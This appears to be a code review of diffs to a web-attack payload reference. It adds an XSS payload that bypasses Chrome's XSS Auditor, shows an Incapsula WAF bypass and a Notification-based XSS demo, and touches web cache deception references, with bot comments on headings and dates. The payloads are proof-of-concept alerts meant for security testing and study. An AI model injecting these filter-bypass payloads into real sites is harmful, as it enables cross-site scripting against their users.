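Review bot: the new `## AngularJS` section sits in the server-side template injection file, but `{{1+1}}` and `$eval('1+1')` are evaluated by AngularJS in the browser, so this is client-side template injection rather than SSTI; say so in the heading or an intro line, or move the section to the XSS file where it fits. Note also that `$eval` is a method of an Angular scope (`$scope.$eval`), not a bare global, so the first line only applies where a scope is already in hand.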

View File

@ -18,8 +18,9 @@
5. The content of the cache is displayed 5. The content of the cache is displayed
``` ```
[![IMAGE ALT TEXT HERE](https://img.youtube.com/vi/pLte7SomUB8/0.jpg)](https://www.youtube.com/watch?v=pLte7SomUB8) [![YOUTUBE DEMO](https://img.youtube.com/vi/pLte7SomUB8/0.jpg)](https://www.youtube.com/watch?v=pLte7SomUB8)
Video of the attack by Omer Gil - Web Cache Deception Attack in PayPal Home Page Video of the attack by Omer Gil - Web Cache Deception Attack in PayPal Home Page
## Thanks to ## Thanks to
* http://omergil.blogspot.fr/2017/02/web-cache-deception-attack.html * [Web Cache Deception Attack - Omer Gil](http://omergil.blogspot.fr/2017/02/web-cache-deception-attack.html)
* [Practical Web Cache Poisoning - James Kettle @albinowax](https://portswigger.net/blog/practical-web-cache-poisoning)

View File

@ -644,6 +644,12 @@ Exotic payloads
## Common WAF Bypass ## Common WAF Bypass
### Chrome Auditor - 9th august
```javascript
</script><svg><script>alert(1)-%26apos%3B
```
Live example by @brutelogic - [https://brutelogic.com.br/xss.php](https://brutelogic.com.br/xss.php?c1=</script><svg><script>alert(1)-%26apos%3B)
### Incapsula WAF Bypass - 8th march ### Incapsula WAF Bypass - 8th march
```javascript ```javascript
anythinglr00</script><script>alert(document.domain)</script>uxldz anythinglr00</script><script>alert(document.domain)</script>uxldz
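Review bot: `### Chrome Auditor - 9th august` carries no year, following the existing `### Incapsula WAF Bypass - 8th march` heading, which has the same gap; these dates only help a reader judge whether the filter has since been fixed, so write the full date (presumably 2018 here, given the commit date). The fence is tagged ```javascript, but the payload is URL-encoded HTML (`</script><svg><script>...%26apos%3B`), so ```html would be closer.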
@ -663,10 +669,10 @@ Use notification box instead of an alert - by [@brutelogic](https://twitter.com/
Note : it requires user permission Note : it requires user permission
``` ```
Notification.requestPermission(x=>{new(Notification)(1)}) Notification.requestPermission(x=>{new(Notification)(1)})
Try here : https://brutelogic.com.br/xss.php?c3=%27;Notification.requestPermission(x=>%7Bnew(Notification)(1)%7D)//
``` ```
Try here : [https://brutelogic.com.br/xss.php](https://brutelogic.com.br/xss.php?c3=%27;Notification.requestPermission(x=>%7Bnew(Notification)(1)%7D)//)
## Thanks to ## Thanks to
* https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot * https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot